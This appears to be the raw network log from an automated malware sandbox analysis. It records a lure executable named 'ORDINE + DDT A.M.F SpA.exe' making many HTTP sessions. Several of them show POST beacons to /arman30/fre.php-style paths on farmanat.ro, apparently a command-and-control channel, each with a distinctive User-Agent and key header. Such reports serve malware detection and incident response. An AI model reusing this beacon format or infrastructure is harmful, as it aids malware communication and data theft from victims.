                                              451192.168.11.2050295176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              452192.168.11.2050296176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              453192.168.11.2050297176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              454192.168.11.2050298176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              455192.168.11.2050299176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              456192.168.11.2050300176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              457192.168.11.2050301176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              458192.168.11.2050302176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              459192.168.11.2050303176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              46192.168.11.2049882176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:31.231230021 CET6374OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:31.317507029 CET6374INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              460192.168.11.2050304176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              461192.168.11.2050305176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              462192.168.11.2050306176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              463192.168.11.2050307176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              464192.168.11.2050308176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              465192.168.11.2050309176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              466192.168.11.2050310176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              467192.168.11.2050311176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              468192.168.11.2050312176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              469192.168.11.2050313176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              47192.168.11.2049883176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:31.831959963 CET6375OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:31.919064045 CET6376INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              470192.168.11.2050314176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              471192.168.11.2050315176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              472192.168.11.2050316176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              473192.168.11.2050317176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              474192.168.11.2050318176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              475192.168.11.2050319176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              476192.168.11.2050320176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              477192.168.11.2050321176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              478192.168.11.2050322176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              479192.168.11.2050323176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              48192.168.11.2049884176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:32.435657024 CET6376OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:32.519407034 CET6377INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              480192.168.11.2050324176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              481192.168.11.2050325176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              482192.168.11.2050326176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              483192.168.11.2050327176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              484192.168.11.2050328176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              485192.168.11.2050329176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              486192.168.11.2050330176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              487192.168.11.2050331176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              488192.168.11.2050332176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              489192.168.11.2050333176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              49192.168.11.2049885176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:33.088495016 CET6378OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:33.174014091 CET6378INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              490192.168.11.2050334176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              491192.168.11.2050335176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              492192.168.11.2050336176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              493192.168.11.2050337176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              494192.168.11.2050338176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              495192.168.11.2050339176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              496192.168.11.2050340176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              497192.168.11.2050341176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              498192.168.11.2050342176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              499192.168.11.2050343176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.11.2049824176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:03.269522905 CET6306OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:03.352428913 CET6306INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              50192.168.11.2049886176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:33.744999886 CET6379OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:33.827759027 CET6380INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              500192.168.11.2050344176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              501192.168.11.2050345176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              502192.168.11.2050346176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              503192.168.11.2050347176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              504192.168.11.2050348176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              505192.168.11.2050349176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              506192.168.11.2050350176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              507192.168.11.2050351176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              508192.168.11.2050352176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              509192.168.11.2050353176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              51192.168.11.2049887176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:34.343229055 CET6380OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:34.427978992 CET6381INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              510192.168.11.2050354176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              511192.168.11.2050355176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              512192.168.11.2050356176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              513192.168.11.2050357176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              514192.168.11.2050358176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              515192.168.11.2050359176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              516192.168.11.2050360176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              517192.168.11.2050361176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              518192.168.11.2050362176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              519192.168.11.2050363176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              52192.168.11.2049888176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:34.941843033 CET6382OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:35.026457071 CET6382INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              520192.168.11.2050364176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              521192.168.11.2050365176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              522192.168.11.2050366176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              523192.168.11.2050367176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              524192.168.11.2050368176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              525192.168.11.2050369176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              526192.168.11.2050370176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              527192.168.11.2050371176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              528192.168.11.2050372176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              529192.168.11.2050373176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              53192.168.11.2049889176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:35.542264938 CET6383OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:35.624941111 CET6384INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              530192.168.11.2050374176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              531192.168.11.2050375176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              532192.168.11.2050376176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              533192.168.11.2050377176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              534192.168.11.2050378176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              535192.168.11.2050379176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              536192.168.11.2050380176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              537192.168.11.2050381176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              538192.168.11.2050382176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              539192.168.11.2050383176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              54192.168.11.2049890176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:36.204633951 CET6384OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:36.296611071 CET6385INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              540192.168.11.2050384176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              541192.168.11.2050385176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              542192.168.11.2050386176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
